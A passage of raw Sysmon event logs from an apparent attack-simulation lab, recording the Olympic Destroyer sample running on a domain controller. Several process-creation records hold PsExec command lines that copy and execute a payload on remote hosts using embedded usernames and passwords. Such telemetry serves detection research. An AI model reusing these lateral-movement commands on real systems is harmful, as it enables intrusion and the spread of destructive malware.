Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.560{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.560{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.560{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.560{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.560{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.560{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.544{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.544{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.544{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.544{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.544{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.544{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.544{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.528{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.491{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.491{C8EA50B7-F2AD-6215-C000-000000003802}48565992C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\7-Zip\7-zip.dll+545c|C:\Program Files\7-Zip\7-zip.dll+67e5|C:\Program Files\7-Zip\7-zip.dll+6e16|C:\Program Files\7-Zip\7-zip.dll+8dde|C:\Program Files\7-Zip\7-zip.dll+c301|C:\Windows\System32\SHELL32.dll+80407|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\System32\SHELL32.dll+17c35c|C:\Windows\System32\SHELL32.dll+19eb28|C:\Windows\System32\SHELL32.dll+2846f3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17c600|C:\Windows\System32\SHELL32.dll+179a7e|C:\Windows\System32\SHELL32.dll+73861|C:\Windows\System32\SHELL32.dll+76746|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026 154100x8000000000000000292969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.500{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe21.077-Zip GUI7-ZipIgor Pavlov7zg.exe"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap9496:28:7zEvent32705 -ad -saa -- "C:\Temp\drop"C:\Windows\system32\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=300B8E1F636DCDE7269EF18600493819,SHA256=3AEF7662DCDBBC952A3ECD3677DA943EF3D4AECB5BD624625B6B176B1B5CE617,IMPHASH=C60649CDE63EC51599F93CD2D0157322{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x8000000000000000292968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.444{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1315-6216-4506-000000003802}3972C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.444{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1315-6216-4406-000000003802}6520C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.428{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1315-6216-4506-000000003802}3972C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.428{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-1315-6216-4506-000000003802}3972C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.438{C8EA50B7-1315-6216-4506-000000003802}3972C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 534500x8000000000000000292963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.426{C8EA50B7-1315-6216-4106-000000003802}1244C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.407{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-1315-6216-4406-000000003802}6520C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.420{C8EA50B7-1315-6216-4406-000000003802}6520C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-12.eu-central-1.compute.internal -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.407{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1315-6216-4406-000000003802}6520C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.407{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1315-6216-4106-000000003802}1244C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 